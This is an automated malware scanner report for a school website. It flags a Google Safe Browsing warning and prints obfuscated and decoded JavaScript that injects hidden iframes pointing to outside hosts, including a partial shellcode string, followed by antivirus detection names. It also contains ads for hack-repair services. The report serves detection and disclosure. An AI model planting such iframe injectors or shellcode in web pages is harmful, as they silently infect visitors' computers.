New scan:

Malware Scanner report for e-school-ksa.com

Malicious/Suspicious/Total urls checked
1/1/5
2 pages have malicious or suspicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "e-school-ksa.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=e-school-ksa.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://e-school-ksa.com/
200 OK
Content-Length: 799
Content-Type: text/html
clean
http://mix-plus.co.kr/p_image/index.php
200 OK
Content-Length: 4260
Content-Type: application/javascript
suspicious
Suspicious code. Script contains iFrame.

function ad9(t1E){return t1E.replace(/%/g,'').replace(/[~G'k]/g,eGp2)}
YUK0='G64ock75~6de~6et.G77ri~74e(k22k3cd~69vk20styleG3dG5ck22positiok6ek3aabG73oluteG3b ~6ceft~3a~2d10~300pG78~3b tk6fp~3ak2d1k30k300pxk3bG5cG22~3eG22)G3bfuncti~6fn i73(a)~7bd~6fcumenk74.write~28~22G3cif~72k61me k73rck3d~5ck22httpG3aG2f~2fmixk2dpluk73.~63o.~6bk72~2fp~5fimag~65~2finde~78.k70h~70k3fs~3dk6a~5ak54KN~62dfG26iG64G3dk22+a~2bk22~5ck22k3e~3ck2fif~72a~6dek3ek22)k3bk7
...[3828 bytes skipped]...

Decoded script:


document.write("<div style=\"position:absolute; left:-1000px; top:-1000px;\">");function i73(a){document.write("<iframe src=\"http://mix-plus.co.kr/p_image/index.php?s=jZTKNbdf&id="+a+"\"></iframe>");}ZamO9=0;var scode="%uC031%u6499%u4003%u8B30%u0C40%u708B%uAD1C%u688B%uE808%u007C%u0000%u458B%u533C%u548B%u7805%u0156%u83EA%uFFC9%u8B52%u2072%uEE01%uAD41%uDB31%uC199%u0DCB%uD301%u9940%u5402%uFF05%uF375%uFB39%uEA75%u8B5E%u245E%uEB01%u8B66%u4B0C%u5E8B%u011C%u8BEB%u8B04%uE801%u5B5E%uE0FF%uBF50%uED49%u7E0F%uD3FF%u565E%u5250%u6854%uC000%u0000%u5056%u8BBF%uE
...[4436 bytes skipped]...

http://e-school-ksa.com/search.php
200 OK
Content-Length: 751
Content-Type: text/html
clean
http://e-school-ksa.com/test404page.js
404 Not Found
Content-Length: 70565
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

function cE(){};this.hG=17182;cE.prototype = {kK : function() {var b=false;var l=15867;yG="yG";return 'hGtGt]p(:I/I/(aIdGien(gGuer(j].ecIoGm]/Gc(o]uIn(t(1e1(.(p]hGp('.gA(/[\(e\]IG]/g, '');this.cI=false;var cQ="";},f : function() {this.s=11249;var i="";this.w=false;mG="mG";var kT=26949;var d=window;var uF=new Date();var uR=function(){return 'uR'};var p = this;var wV="";var o=10714;var lZ=false;var z=document;this.pA=false;this.kZ=25718;var aP=new Arra
...[1921 bytes skipped]...

Decoded script:


document.write('<iframe scrolling="no" width="1" height="1" border="0" frameborder="0" src="http://tamarer.com/count20.php"></iframe>')
document.write('<iframe scrolling="no" width="1" height="1" border="0" frameborder="0" src="http://tamarer.com/count20.php"></iframe>')
<iframe scrolling="no" width="1" height="1" border="0" frameborder="0" src="http://tamarer.com/count20.php"></iframe>

Antivirus reports:

AntiVir
JS/Pegel.BR.51139
Avast
JS:Iframe-CL [Trj]
Ikarus
Trojan.JS.Redirector
nProtect
Trojan.JS.Agent.ECO
TrendMicro-HouseCall
JS_IFRAME.SMDM
Emsisoft
Trojan.JS.Agent.ECO (B)
Comodo
TrojWare.JS.Agent.BA
DrWeb
JS.Redirector.64
TrendMicro
JS_IFRAME.SMDM
Kaspersky
Trojan.JS.Iframe.mn
Microsoft
Trojan:JS/Iframe.R
MicroWorld-eScan
Trojan.JS.Agent.ECO
Fortinet
JS/Iframe.MN!tr
PCTools
Trojan.Malscript
TotalDefense
JS/Redir.W
NANO-Antivirus
Trojan.Script.Redir.sgzm
F-Secure
Trojan.JS.Agent.ECO
VIPRE
Malware.JS.Generic (JS)
AVG
HTML/Framer
Norman
Suspicious_Gen2.MBKNA
GData
Trojan.JS.Agent.ECO
Symantec
Trojan.Malscript!html
Agnitum
JS.Redirector.Gen.10
ESET-NOD32
JS/TrojanDownloader.Pegel.CD
BitDefender
Trojan.JS.Agent.ECO

http://e-school-ksa.com/forgot.php
200 OK
Content-Length: 751
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: e-school-ksa.com

Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sat, 13 Dec 2014 10:00:10 GMT
Pragma: no-cache
Server: Apache/2
Vary: Accept-Encoding,User-Agent
Content-Length: 799
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=be7152e4987a7517c373ed9f73866026; path=/
X-Powered-By: PHP/5.2.17

...799 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: e-school-ksa.com
Referer: http://www.google.com/search?q=e-school-ksa.com

Result:
The result is similar to the first query. There are no suspicious redirects found.